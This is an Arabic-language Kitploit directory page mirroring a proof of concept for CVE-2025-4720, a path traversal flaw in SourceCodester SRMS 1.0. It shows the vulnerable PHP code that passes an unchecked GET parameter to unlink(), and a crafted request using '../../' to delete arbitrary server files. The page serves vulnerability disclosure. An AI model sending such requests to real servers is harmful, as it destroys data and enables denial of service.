Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
duplicate-CVE-2025-4720- — إثبات مفهوم لاستغلال CVE-2025-4720: اجتياز المسار في SourceCodester SRMS 1.0 يتيح حذف ملفات عشوائية عبر معامل GET غير مُتحقق منه. | Kitploit
أدوات/GitHubGitHub/xmyronn/duplicate-cve-2025-4720-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubxmyronn/duplicate-cve-2025-4720-

duplicate-CVE-2025-4720-

إثبات مفهوم لاستغلال CVE-2025-4720: اجتياز المسار في SourceCodester SRMS 1.0 يتيح حذف ملفات عشوائية عبر معامل GET غير مُتحقق منه.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

cve-srms-drop-student-path-traversal (CVE-2025-4720)(مكرر)

حذف ملفات اعتباطي في SourceCodester SRMS 1.0

الوصف

توجد ثغرة اجتياز المسار (Path Traversal) في نقطة النهاية drop_student.php في نظام إدارة نتائج الطلاب (SRMS) من SourceCodester الإصدار 1.0.

يأخذ التطبيق مدخلات يتحكم بها المستخدم من معامل GET img ويمررها مباشرة إلى دالة unlink() دون التحقق من صحتها، مما يسمح بحذف ملفات اعتباطية على الخادم.


الكود الضعيف

root@kitploit:~
$img = $_GET['img'];

if ($img == "DEFAULT") {

} else {
    unlink('images/students/' . $img);
}

نوع الثغرة

  • CWE-22: اجتياز المسار (Path Traversal)
  • التأثير: حذف ملفات اعتباطي (Arbitrary File Deletion)

إثبات المفهوم (PoC)

  1. أنشئ ملفًا في جذر التطبيق: لقطة شاشة 2026-04-04 013454
root@kitploit:~
C:\xampp\htdocs\srms_0\srms\new_test.txt
  1. أرسل الطلب التالي: لقطة شاشة 2026-04-04 013510
لقطة شاشة 2026-04-04 013633
root@kitploit:~
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
  1. لاحظ أنه تم حذف الملف من الخادم. لقطة شاشة 2026-04-04 013650

التأثير

يمكن للمهاجم حذف ملفات اعتباطية يمكن لخادم الويب الوصول إليها، بما في ذلك:

  • ملفات تكوين التطبيق
  • السجلات (Logs)
  • المحتوى المرفوع

قد يؤدي هذا إلى حرمان الخدمة (Denial of Service) أو استغلال إضافي.


ملاحظات إضافية

تمثل هذه الثغرة ناقل هجوم مختلفًا مقارنة بالمشكلات المبلغ عنها سابقًا في SRMS، حيث إنها:

  • تستخدم طلب GET
  • لا تتطلب رفع ملف
  • يمكن استغلالها عبر CSRF

البائع (Vendor)

SourceCodester


المنتج (Product)

نظام إدارة نتائج الطلاب (Student Result Management System - SRMS) https://www.sourcecodester.com/srms-makumbusho


الإصدار (Version)

1.0


المؤلف (Author)

Imad Alvi

تنزيل الأداة